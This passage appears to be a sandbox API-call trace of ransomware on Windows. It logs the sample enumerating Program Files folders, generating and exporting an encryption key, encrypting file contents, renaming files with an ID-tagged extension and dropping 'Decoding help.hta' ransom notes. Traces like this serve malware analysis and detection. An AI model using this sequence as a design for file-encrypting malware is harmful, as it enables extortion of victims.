db\\xmlrwbin.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrwbin.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.435] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrwbin.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0056.435] CreateFileMappingA (hFile=0x348, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x8d4 [0056.436] CryptAcquireContextA (in: phProv=0x1cd1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1cd1fcec*=0x344a348) returned 1 [0059.879] CryptGenKey (in: hProv=0x344a348, Algid=0x6610, dwFlags=0x1, phKey=0x1cd1fce8 | out: phKey=0x1cd1fce8*=0x5da678) returned 1 [0059.879] CryptExportKey (in: hKey=0x5da678, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1cd1fbe4, pdwDataLen=0x1cd1fce4 | out: pbData=0x1cd1fbe4*, pdwDataLen=0x1cd1fce4*=0x2c) returned 1 [0059.879] MapViewOfFile (hFileMappingObject=0x8d4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e200) returned 0x2fd0000 [0059.892] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cd1fbe4*, pdwDataLen=0x1cd1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1cd1fbe4*, pdwDataLen=0x1cd1fcf8*=0x100) returned 1 [0059.892] CryptEncrypt (in: hKey=0x5da678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fd0000, pdwDataLen=0x1cd1fce4*=0x1e200, dwBufLen=0x1e200 | out: pbData=0x2fd0000*, pdwDataLen=0x1cd1fce4*=0x1e200) returned 1 [0059.930] UnmapViewOfFile (lpBaseAddress=0x2fd0000) returned 1 [0059.934] CloseHandle (hObject=0x8d4) returned 1 [0059.934] CryptDestroyKey (hKey=0x5da678) returned 1 [0059.934] CryptReleaseContext (hProv=0x344a348, dwFlags=0x0) returned 1 [0059.934] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.934] WriteFile (in: hFile=0x348, lpBuffer=0x1cd1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1cd1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1cd1fbe4*, lpNumberOfBytesWritten=0x1cd1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.355] WriteFile (in: hFile=0x348, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1cd1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1cd1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.355] CloseHandle (hObject=0x348) returned 1 [0061.355] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.355] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x305d2000, ftCreationTime.dwHighDateTime=0x1c8e1ec, ftLastAccessTime.dwLowDateTime=0x5f3710f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x305d2000, ftLastWriteTime.dwHighDateTime=0x1c8e1ec, nFileSizeHigh=0x0, nFileSizeLow=0x1e218, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmlrwbin.dll", cAlternateFileName="")) returned 0 [0061.355] FindClose (in: hFindFile=0x5e3030 | out: hFindFile=0x5e3030) returned 1 Thread: id = 441 os_tid = 0xbd0 [0044.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*", lpFindFileData=0x1ce5fd30 | out: lpFindFileData=0x1ce5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52694b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52694b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da7b8 [0044.451] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.451] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x1ce5fd30 | out: lpFindFileData=0x1ce5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52694b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52694b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.451] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.451] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.451] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x1ce5fd30 | out: lpFindFileData=0x1ce5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x610018f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x610018f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivateAssemblies", cAlternateFileName="PRIVAT~1")) returned 1 [0044.451] lstrcmpW (lpString1=".", lpString2="PrivateAssemblies") returned -1 [0044.451] lstrcmpW (lpString1="..", lpString2="PrivateAssemblies") returned -1 [0044.451] lstrcmpiW (lpString1="windows", lpString2="PrivateAssemblies") returned 1 [0044.455] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*" [0044.455] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*") returned 68 [0044.455] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\", lpString2="PrivateAssemblies" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies" [0044.455] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*" [0044.455] GlobalMemoryStatus (in: lpBuffer=0x1ce5fd10 | out: lpBuffer=0x1ce5fd10) [0044.455] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11729c18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3ec [0044.535] CloseHandle (hObject=0x3ec) returned 1 [0044.535] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x1ce5fd30 | out: lpFindFileData=0x1ce5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52694b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61771db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61771db0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublicAssemblies", cAlternateFileName="PUBLIC~1")) returned 1 [0044.535] lstrcmpW (lpString1=".", lpString2="PublicAssemblies") returned -1 [0044.535] lstrcmpW (lpString1="..", lpString2="PublicAssemblies") returned -1 [0044.535] lstrcmpiW (lpString1="windows", lpString2="PublicAssemblies") returned 1 [0044.538] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*" [0044.538] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*") returned 68 [0044.538] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\", lpString2="PublicAssemblies" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies" [0044.538] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*" [0044.538] GlobalMemoryStatus (in: lpBuffer=0x1ce5fd10 | out: lpBuffer=0x1ce5fd10) [0044.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x244c0118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3ec [0044.652] CloseHandle (hObject=0x3ec) returned 1 [0044.652] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x1ce5fd30 | out: lpFindFileData=0x1ce5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f37b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f37b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0044.652] lstrcmpW (lpString1=".", lpString2="VSTA") returned -1 [0044.652] lstrcmpW (lpString1="..", lpString2="VSTA") returned -1 [0044.652] lstrcmpiW (lpString1="windows", lpString2="VSTA") returned 1 [0044.655] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*" [0044.655] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*.*") returned 68 [0044.655] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\", lpString2="VSTA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA" [0044.655] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\*.*" [0044.655] GlobalMemoryStatus (in: lpBuffer=0x1ce5fd10 | out: lpBuffer=0x1ce5fd10) [0044.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24508250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3ec [0044.745] CloseHandle (hObject=0x3ec) returned 1 [0044.745] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x1ce5fd30 | out: lpFindFileData=0x1ce5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f37b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f37b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 0 [0044.745] FindClose (in: hFindFile=0x5da7b8 | out: hFindFile=0x5da7b8) returned 1 Thread: id = 442 os_tid = 0xbe4 [0044.533] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\*.*", lpFindFileData=0x1cf9fd30 | out: lpFindFileData=0x1cf9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5c30 [0044.650] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.650] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0x1cf9fd30 | out: lpFindFileData=0x1cf9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.650] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.650] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.650] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0x1cf9fd30 | out: lpFindFileData=0x1cf9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Debugger", cAlternateFileName="")) returned 1 [0044.650] lstrcmpW (lpString1=".", lpString2="Debugger") returned -1 [0044.650] lstrcmpW (lpString1="..", lpString2="Debugger") returned -1 [0044.650] lstrcmpiW (lpString1="windows", lpString2="Debugger") returned 1 [0044.650] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\*.*" [0044.650] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\*.*") returned 73 [0044.650] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\", lpString2="Debugger" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger" [0044.650] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\*.*" [0044.650] GlobalMemoryStatus (in: lpBuffer=0x1cf9fd10 | out: lpBuffer=0x1cf9fd10) [0044.651] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9822640, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x28c [0044.743] CloseHandle (hObject=0x28c) returned 1 [0044.743] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0x1cf9fd30 | out: lpFindFileData=0x1cf9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Debugger", cAlternateFileName="")) returned 0 [0044.743] FindClose (in: hFindFile=0x5a5c30 | out: hFindFile=0x5a5c30) returned 1 Thread: id = 443 os_tid = 0xbd4 [0044.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*", lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da678 [0044.714] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.714] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.714] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.714] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.715] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x27ed4187, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1a74, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0044.715] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0044.715] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 64 [0044.715] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" [0044.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\decoding help.hta")) returned 0xffffffff [0044.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0045.395] WriteFile (in: hFile=0x238, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1d0dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1d0dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.514] CloseHandle (hObject=0x238) returned 1 [0045.514] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.689] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0048.689] lstrlenW (lpString="drag.png") returned 8 [0048.689] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.689] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 64 [0048.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" [0048.689] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" [0048.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.690] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0048.690] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0048.690] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0048.690] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0048.692] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 64 [0048.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US" [0048.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0048.692] GlobalMemoryStatus (in: lpBuffer=0x1d0dfd10 | out: lpBuffer=0x1d0dfd10) [0048.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2481d950, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x764 [0048.699] CloseHandle (hObject=0x764) returned 1 [0048.699] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28135767, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x28135767, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x28135767, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd13, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0048.699] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") 